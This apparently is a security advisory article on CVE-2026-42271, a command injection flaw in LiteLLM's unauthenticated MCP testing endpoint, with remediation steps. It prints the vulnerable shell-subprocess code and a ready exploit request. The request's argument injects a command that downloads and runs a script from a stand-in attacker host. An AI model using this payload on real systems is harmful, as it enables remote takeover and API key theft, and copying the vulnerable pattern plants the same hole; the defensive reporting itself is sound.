CISA Adds LiteLLM Gateway Command Injection (CVE-2026-42271) to KEV Catalog
By Vatsal Shah | June 12, 2026 | 6 min read | Source: GitHub / BerriAI
- Vulnerability ID: CVE-2026-42271
- Severity Rating: CVSS v3.1 Base Score: 8.7 (High)
- Affected Versions: LiteLLM v1.74.2 through v1.83.6
- Vulnerability Type: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
- Remediation Deadline: June 22, 2026 (Federal Directive)
- Patched Version: LiteLLM v1.83.7 and later
Lead Paragraph
WASHINGTON, D.C. — The Cybersecurity and Infrastructure Security Agency (CISA) has officially added CVE-2026-42271 to its Known Exploited Vulnerabilities (KEV) catalog on June 12, 2026. The vulnerability involves a high-severity (CVSS 8.7) command injection flaw in the popular open-source AI gateway LiteLLM (specifically versions v1.74.2 through v1.83.6). Attackers are actively exploiting this vulnerability by targeting the unauthenticated /mcp-rest/test/connection testing endpoint to execute arbitrary operating system commands on host containers and servers. Due to evidence of active wild exploitation, CISA has mandated a strict remediation deadline of June 22, 2026 for all federal agencies to apply the vendor-provided security patches or disable affected testing endpoints. This represents the first major open-source AI gateway vulnerability to land in the KEV catalog, highlighting the growing AppSec risks surrounding Model Context Protocol (MCP) server testing tools.
What Happened
The vulnerability, designated as CVE-2026-42271, stems from an improper input validation routine within LiteLLM's implementation of the Model Context Protocol (MCP) server testing interface. LiteLLM provides a proxy layer that translates standardized LLM API calls across hundreds of models while managing load balancing, API keys, and server connections.
To simplify debugging, developers introduced a test endpoint—/mcp-rest/test/connection—designed to verify connection status and latencies for third-party MCP servers. However, security researchers discovered that this endpoint was exposed to the public internet by default without authentication checks. More critically, the endpoint passed user-supplied connection parameters directly to an internal shell execution context without sanitizing special shell metacharacters (such as ;, &&, or ||).
An unauthenticated remote attacker can exploit this flaw by sending a crafted HTTP POST request containing malicious shell commands in the connection parameter fields. Because the LiteLLM proxy process frequently runs with root or container-admin privileges to access local configurations, the injected commands execute directly on the underlying host operating system, leading to full host compromise.
Technical Details and Attack Path
The root cause of CVE-2026-42271 lies within the file litellm/proxy/proxy_server.py inside the handler for the /mcp-rest/test/connection route. The handler parsed the connection parameters and initiated a subprocess call to execute connection test binaries or ping endpoints:
class="tok-cm"># Vulnerable Code Pattern in LiteLLM v1.83.6
@router.post(class="tok-str">"/mcp-rest/test/connection")
async class="tok-kw">def test_mcp_connection(data: dict):
class="tok-cm"># Missing authentication validation checks here
mcp_command = data.get(class="tok-str">"command")
mcp_arguments = data.get(class="tok-str">"args", [])
class="tok-cm"># Vulnerable subprocess instantiation
full_cmd = fclass="tok-str">"mcp-cli test {mcp_command} " + class="tok-str">" ".join(mcp_arguments)
process = await asyncio.create_subprocess_shell(
full_cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
return {class="tok-str">"status": class="tok-str">"success", class="tok-str">"output": stdout.decode()}
Because the code uses create_subprocess_shell with a raw formatted string, an attacker can input arguments like "; curl http://malicious.domain/malware | sh #" to escape the intended mcp-cli command boundary and run arbitrary payloads.
Exploit Payload Example
In active exploits observed by security teams, attackers send a standard POST request directly to the vulnerable route:
POST /mcp-rest/test/connection HTTP/1.1
Host: target-litellm-proxy.internal:4000
Content-Type: application/json
{
class="tok-str">"command": class="tok-str">"verify",
class="tok-str">"args": [
class="tok-str">"localhost",
class="tok-str">"; wget -qO- http:class="tok-cm">//attacker-server.com/payload.sh | bash #"
]
}
The shell interprets the semicolon as a command separator, executes the connection test, and immediately downloads and runs the shell script from the attacker's server.
Why It Matters: AI Gateways as High-Value Targets
The addition of CVE-2026-42271 to the CISA KEV catalog is a significant milestone in AI security. As enterprises rapidly adopt LLMs, they deploy AI gateways like LiteLLM, Portkey, and Langfuse to act as central routing layers. These gateways possess high-value credentials, including API keys to OpenAI, Anthropic, AWS Bedrock, and Azure AI, alongside direct read-write access to internal enterprise vector databases.
By gaining remote code execution (RCE) on a LiteLLM proxy, attackers can:
- Extract API Keys: Access the local memory space or environment variables containing plaintext API credentials.
- Access Proprietary Data: Intercept user prompts and model completions, potentially exposing sensitive IP or personally identifiable information (PII).
- Lateral Movement: Utilize the gateway's network access to breach internal databases, directories, and host configurations.
This highlights the risk of "shadow AI" tools bypassing standard enterprise security reviews. To understand how IT teams can govern these deployments, read our deep-dive on Surviving Shadow AI and Architecting Enterprise Governance.
Furthermore, this exploit illustrates that while AI model outputs are heavily scrutinized, the classical software execution layers surrounding AI systems (like gateways and prompt parsers) remain highly vulnerable. For a wider look at agentic security breaches, see our report on the 88% of Enterprises Reporting AI Agent Security Incidents.
Authorization Boundaries: The Proxy Security Gap
The fundamental architectural flaw in affected LiteLLM proxy versions was the lack of separation between public-facing endpoints (like chat completions) and administrative or utility testing routes. The table below outlines how the authorization boundaries failed:
| Route Path | Intended Access Level | Pre-v1.83.7 Vulnerability State | Post-v1.83.7 Remediated State |
|---|---|---|---|
/v1/chat/completions | Authenticated (User API Key) | Correctly validated via bearer token | Correctly validated via bearer token |
/mcp-rest/test/connection | Authenticated (Admin Key Only) | Unauthenticated / Publicly Exposed | Requires Admin Authorization header |
/config/update | Authenticated (Admin Key Only) | Correctly validated via admin key | Correctly validated via admin key |
By exposing the /mcp-rest/test/connection route without checking for the proxy's master key, LiteLLM allowed any client to access administrative testing utilities, enabling command execution.
Remediation and Mitigation Steps
LiteLLM developers released a security patch in version v1.83.7 that mitigates CVE-2026-42271 by enforcing admin-level authentication on the testing endpoint and replacing the shell execution model with parameterized argument arrays that do not invoke a command shell.
To secure your environment, follow these steps immediately:
1. Upgrade LiteLLM Container Images
Update your Dockerfiles and deployment manifests to use LiteLLM v1.83.7 or later. Verify the running version by calling the metadata endpoint:
curl http:class="tok-cm">//localhost:4000/version
class="tok-cm"># Output must indicate version >= 1.83.7
2. Disable Testing Endpoints in Configuration
If you cannot upgrade immediately, block public access to all /mcp-rest/* routes at the ingress controller or load balancer layer. In Nginx, this can be achieved with a deny rule:
location ~ ^/mcp-rest/ {
deny all;
class="tok-kw">return 403;
}
3. Rotate Credentials
If you detect active exploitation or unauthorized access logs targeting /mcp-rest/test/connection, assume that credentials stored in the environment have been compromised. Immediately rotate all model provider keys (OpenAI, Anthropic, AWS) and database access strings.
These steps align with the security requirements defined by the OWASP Agentic AI Security 2.0 Maturity Model, which emphasizes runtime isolation and strict input verification for all external tool dependencies.
Key Takeaways
- Vulnerability Details: CVE-2026-42271 is an unauthenticated command injection vulnerability in LiteLLM's
/mcp-rest/test/connectionendpoint. - Severity: Rated CVSS 8.7 (High), actively exploited in the wild to compromise hosts.
- Federal Mandate: CISA KEV listing enforces a remediation deadline of June 22, 2026 for all federal agencies.
- Root Cause: Lack of authentication checks combined with unsafe
create_subprocess_shellexecution of user-supplied command arguments. - Remediation: Upgrade to LiteLLM v1.83.7 or block routing to
/mcp-rest/*endpoints immediately.